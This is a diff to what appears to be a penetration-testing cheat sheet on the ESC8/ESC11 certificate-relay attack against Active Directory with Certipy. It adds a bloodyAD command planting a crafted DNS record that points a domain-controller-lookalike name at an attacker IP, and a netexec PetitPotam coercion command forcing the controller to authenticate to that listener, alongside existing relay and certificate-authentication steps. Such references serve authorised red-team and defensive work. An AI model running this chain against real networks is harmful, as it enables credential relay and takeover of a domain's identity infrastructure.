--- a/armoury/data/cheats/Active_directory/Certipy/ESC8_11.md
+++ b/armoury/data/cheats/Active_directory/Certipy/ESC8_11.md
@@ -20,9 +20,14 @@ certipy relay -target 'https://<IP_ADDRESS>'
 ## Tip: If you get a 'permission denied' while trying to listen on port 445, you can use the command (on Linux): `echo 0 | sudo tee /proc/sys/net/ipv4/ip_unprivileged_port_start`
 
 ## 3. Coerce Authentication with other tool (Petitpotam, Coercer)
+```
+bloodyAD -u <username> -p <password> -d <domain> -k --host <CA_FQDN> add dnsRecord <dc-hostname>UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA <attacker-ip>
+```
 
 ## 4. Certipy relays the authentication and requests a certificate
-
+```
+netexec smb <DC_FQDN>  -u <username> -p <password> -k -M coerce_plus -o LISTENER=<dc-hostname>UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
+```
 ## 3. Authenticate
 ```
 certipy auth -pfx <ADMIN_USER>.pfx -dc-ip <DC_IP>
